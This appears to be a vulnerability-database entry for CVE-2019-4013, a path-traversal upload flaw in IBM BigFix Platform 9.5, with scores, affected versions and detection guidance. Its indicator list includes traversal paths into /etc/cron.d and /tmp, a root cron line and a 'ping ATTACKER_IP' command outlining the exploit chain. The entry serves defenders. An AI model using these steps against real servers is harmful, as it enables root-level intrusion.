cbcvebase.
CVE-2019-4013
published 2019-04-10

CVE-2019-4013: IBM BigFix Platform 9.5 could allow any authenticated user to upload any file to any location on the server with root privileges. This results in code…

PriorityP270critical9.9CVSS 3.0
AVNACLPRLUINSCCHIHAH
EXPLOIT
EPSS
14.11%
96.1th percentile
IBM BigFix Platform 9.5 could allow any authenticated user to upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges. IBM X-Force ID: 155887.

Affected

2 ranges
VendorProductVersion rangeFixed in
ibmbigfix_platform
ibmbigfix_platform9.5.0 – 9.5.11

Detection & IOCsextracted from sources · hover to see the quote

url/swd/api/packages/upload
path../../../../../../../../etc/cron.d/task
path../../../../../../../../tmp/icmp.sh
command* * * * * root bash /tmp/icmp.sh
commandping -c 3 ATTACKER_IP
filenamecron.txt
filenameicmp.txt
  • Detect POST requests to the vulnerable upload endpoint /swd/api/packages/upload containing path traversal sequences (e.g., '../../../../') in the 'urlFileName' multipart form field.
  • Alert on the 'urlFileName' parameter value targeting sensitive OS paths such as /etc/cron.d/ or /tmp/ via directory traversal in multipart uploads to IBM BigFix.
  • Monitor for the 'fileURL' multipart field pointing to an external/attacker-controlled IP or domain in requests to /swd/api/packages/upload, indicating server-side request forgery or remote file fetch abuse.
  • Detect creation of new files under /etc/cron.d/ or execution of scripts from /tmp/ on IBM BigFix server hosts, which may indicate successful exploitation via the race-condition cron drop technique.
  • Flag authenticated sessions (user_session cookie present) issuing multipart/form-data POSTs to /swd/api/packages/upload with the 'urlDownloadAtRuntime' field set to 'false', which is the specific vulnerable upload-via-URL code path.
  • ·Exploitation requires an authenticated session — the attacker must already possess valid credentials for the IBM BigFix Platform web interface before the path traversal upload can be triggered.
  • ·The vulnerability is specific to the 'upload via URL' option in the Software Distribution (SWD) module; the direct file upload path is not affected.
  • ·The cron-based RCE technique relies on a race condition — the two upload requests (cron file and script file) must be sent in a loop to win the race before the temporary file is moved away.

CVSS provenance

nvdv3.09.9CRITICALCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
osv9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.